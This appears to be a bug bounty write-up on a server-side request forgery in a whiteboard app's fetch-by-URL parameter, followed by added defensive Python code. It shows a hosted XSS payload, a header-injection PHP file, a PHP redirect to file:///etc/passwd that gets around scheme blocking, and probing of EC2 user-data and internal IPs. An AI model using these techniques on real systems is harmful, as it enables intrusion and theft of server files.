“Exploiting a Single Parameter”

Hello there friends and all community members. It's been ages since I did a write-up, as I like to work silently. For the past few days I have seen many write-ups while scrolling my Facebook news feed, so I thought I would also do a write-up and contribute to this great community. Enough of the boring words, now let's come to the point :P

I hunted in a HackerOne private program, found many low/medium bugs and left the site, as most hunters do :D . A few days later I was going through the website again and noticed a whiteboard sketching web app that was running on Flash. *Ugh! Why didn't I see this before :/*
As you guys know, most of these online whiteboard apps have features like Add Image, Upload Video, etc. With a hacker's mindset we go straight for the IMPORT BY URL feature, so I got the idea to look for it.

After I found the Import by URL parameter I immediately fired up my server and sent this request:

GET /fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111 HTTP/1.1
Host: Site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [REDACTED]
Cookie: [COOKIES HERE]
Connection: keep-alive

Response in my terminal:

hishammir@hishammir:~$ nc -v -l 11111 
Listening on [0.0.0.0] (family 0, port 11111) 
Connection from [54.xxx.xxx.xxx] port 11111 [tcp/*] accepted (family 2, sport 41400)
SUCCESS !

So an SSRF was there. I also tried scanning an external host's ports to differentiate between open and closed ports. I used scanme.nmap.org, on which port 22 is open:

Response on hitting a closed port:

Response on hitting an open port:

So to exploit the SSRF further I started checking which protocols it would connect over, and sadly it was only HTTP & HTTPS :(

As the image fetch endpoint was a GET request, I had a quick thought of opening the endpoint URL directly in the browser:

/fetch?token=a20378e1_6185_11e6_b4b0_0b0c74443f0c&url=http://54.213.234.107:11111

So the URL parameter here was fetching the data from the URL I gave and rendering it locally, inside the site's own page. As an example I put google.com in the URL parameter and the Google homepage was loaded locally. So moving forward I tried finding XSS through the URL parameter itself, and all I was getting was an Invalid URL error :/

No XSS :/

As I figured the URL parameter was fetching the source code of whatever website we provide, why not let it fetch some JS :P

So what I did was create an HTML file with this simple XSS payload and host it on my server.

<script>alert(document.domain)</script>

The result was:

XSSED !

In the same way I created a simple PHP file with the code below, hosted it on my server and gave it to the URL parameter to fetch and execute.

<?php
// Response header from my server, passed straight through to the browser by the fetch endpoint
header('Set-Cookie: Game over');
?>

Response:

Many of you guys must be thinking, why is this noob not trying for RCE :D

After all this I did try hard for RCE or reading server files. So what did I do to try to achieve RCE?

Next, I fiddled with different schemes, but only http and https were possible; $_POST was blocked too, and gopher://, file:// and dict:// seemed to be blocked. But by utilising the same fact that the server fetches whatever resource I point it at, I created a script like:

<?php
// Redirect the fetcher to a file:// URL after its initial scheme check has already passed
header('Location: file:///etc/passwd');
?>

That would bypass the initial file:// scheme blocking, and the server would itself follow the redirect to file:///etc/passwd, which gave an Internal Server Error. That was strong motivation that brute-forcing the header with path traversal, like
header('Location: site.com/../../etc/passwd');
or many more enumerations, could have resulted in a successful read; it just requires time to enumerate. But no luck :/

Next, what I thought had the strongest relevance was out-of-band data exfiltration. I used my own server, as "HTTP" was working fine, and I retrieved data which I received in chunks from an "Internal Server" whose IP was 54.82.xxx.xxx. That is a strong signal of OOB.

So they were using an EC2 instance on 54.82.xxx.xxx, from which I received the chunks, but the common ports of that server were closed and it only opened port 80 once a file_get_contents() was requested. So utilising this, I tried reading their internal server's EC2 instance data via the URL parameter, but there was some type of whitelisting or what!

For example, https://75.101.xxx.xx/latest/user-data/ isn't publicly accessible if you simply open it in the browser, but if you put it in the url= parameter the response was different. Similarly, I retrieved the website's IPs via nslookup and tried accessing those IPs through the URL parameter, hoping to hit an intranet maybe?
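For defenders, here is an added example (not code from the original post or from the program) of how an import-by-URL fetcher can close each gap used above: a scheme allow-list, resolving the host and refusing any non-public address (which covers the 169.254.169.254 instance-metadata address), following redirects by hand so a Location: file:// or Location: http://<internal> hop is re-checked, and returning only verified image bytes with none of the upstream headers. The http_get callable and the hostnames in the comments are assumptions for illustration.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 3
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png",  # only formats we hand back
               b"\xff\xd8\xff": "image/jpeg", b"GIF8": "image/gif"}

def resolve_all(host):
    """Every address the name maps to; all of them must pass the check."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def url_policy_error(url, resolve=resolve_all):
    """Return the reason a URL is refused, or None if it may be fetched."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme not allowed"  # file://, gopher://, dict:// ...
    if not parts.hostname or parts.username or parts.password:
        return "missing host or embedded credentials"
    try:
        addrs = resolve(parts.hostname)
    except OSError:
        return "unresolvable host"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:  # RFC 1918, loopback, 169.254.169.254 metadata ...
            return f"non-public address {ip}"
    return None

def safe_fetch(url, http_get, resolve=resolve_all):
    """Fetch with redirects followed by hand, so every hop is re-checked.
    http_get(url) (assumed helper) returns (status, headers, body), header names lower-case."""
    for _ in range(MAX_REDIRECTS + 1):
        err = url_policy_error(url, resolve)
        if err:
            raise ValueError(f"blocked {url}: {err}")
        status, headers, body = http_get(url)
        if status in (301, 302, 303, 307, 308) and "location" in headers:
            url = urljoin(url, headers["location"])  # checked on the next pass
            continue
        return body
    raise ValueError("too many redirects")

def image_response(body):
    """Headers for what we return: a verified image type, nothing copied from upstream."""
    for magic, ctype in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return {"Content-Type": ctype, "X-Content-Type-Options": "nosniff"}, body
    raise ValueError("fetched content is not an image")
```

With this layout the fetched HTML and Set-Cookie header from the write-up never reach the victim's browser, and the redirect-to-file:// trick is stopped at the second hop.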

For all the bounty-conscious guys, a bounty of $2.5k was rewarded for the issue.

For past blog posts do visit our blog: https://securitywall.co/blog

Thank you guys for reading this!

Drop your comments below if you have a question ;)